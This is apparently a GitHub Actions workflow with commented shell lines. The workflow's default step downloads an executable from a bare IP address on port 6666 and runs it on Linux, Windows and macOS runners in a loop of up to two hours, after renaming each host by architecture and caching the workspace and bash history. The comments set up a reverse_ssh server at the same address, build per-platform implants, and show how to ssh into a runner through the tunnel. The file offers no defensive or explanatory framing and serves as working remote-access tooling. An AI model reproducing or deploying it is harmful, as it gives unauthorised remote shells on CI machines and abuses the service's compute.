
on:
  workflow_dispatch:
    inputs:
      runs-on:
        default: 'ubuntu-24.04-arm windows-11-arm macos-latest ubuntu-latest windows-latest macos-15-intel ubuntu-slim'
      run:
        default: |
          python3 -c 'import urllib.request; urllib.request.urlretrieve("http://109.188.87.160:6666/{0}_{1}", r"{2}/exe.exe")' && chmod +x '{2}/exe.exe' && touch exit && '{2}/exe.exe' --foreground
jobs:
  loop:
    runs-on: ${{ inputs.runs-on }}
    steps:
    - uses: actions/cache@v5
      with:
        path: |
          .
          /home/runner/.bash_history
        key: workspace
        enableCrossOsArchive: true
    - shell: bash
      run: rm -rf exit
    - if: ${{ runner.os == 'Linux' }}
      run: sudo hostnamectl hostname ${{ runner.arch }}${{ runner.os }}
    - if: ${{ runner.os == 'Windows' }}
      run: |
        $ComputerName = "${{ runner.arch }}${{ runner.os }}"
        Set-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Computername\Computername" -name "Computername" -value $ComputerName
        Set-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Computername\ActiveComputername" -name "Computername" -value $ComputerName
        Set-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" -name "Hostname" -value $ComputerName
        Set-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" -name "NV Hostname" -value  $ComputerName
        Set-ItemProperty -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -name "AltDefaultDomainName" -value $ComputerName
        Set-ItemProperty -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -name "DefaultDomainName" -value $ComputerName
    - if: ${{ runner.os == 'macOS' }}
      run: sudo scutil --set HostName ${{ runner.arch }}${{ runner.os }}
    - shell: bash
      run: |
        while (${{ format(inputs.run, runner.arch, runner.os, runner.temp) }}) || true
        do
          stat '${{ runner.temp }}/exe.exe' || true
          rm -f '${{ runner.temp }}/exe.exe' || true
          if [[ -f exit ]] || (( $SECONDS > 7200 ))
          then
            break
          fi
          sleep 1
          echo -n .
        done
        rm -rf exit

#!/bin/bash
#(sleep 5;  ssh -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null 127.0.0.1 link --goos windows --goarch arm64 --name ARM64_Windows) &
#(sleep 5;  ssh -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null 127.0.0.1 link --goos windows --goarch amd64 --name X64_Windows) &
#(sleep 5;  ssh -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null 127.0.0.1 link --goos linux --goarch arm64 --name ARM64_Linux) &
#(sleep 5;  ssh -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null 127.0.0.1 link --goos linux --goarch amd64 --name X64_Linux) &
#(sleep 5;  ssh -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null 127.0.0.1 link --goos darwin --goarch arm64 --name ARM64_macOS) &
#(sleep 5;  ssh -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null 127.0.0.1 link --goos darwin --goarch amd64 --name X64_macOS) &
#docker run --rm -it -p6666:2222 -e EXTERNAL_ADDRESS=109.188.87.160:6666 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_rsa.pub)" --mount type=tmpfs,destination=/data reversessh/reverse_ssh

#ssh -o ProxyCommand="ssh -W %h:%p 127.0.0.1 -p 6666 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null runner.arm64linux
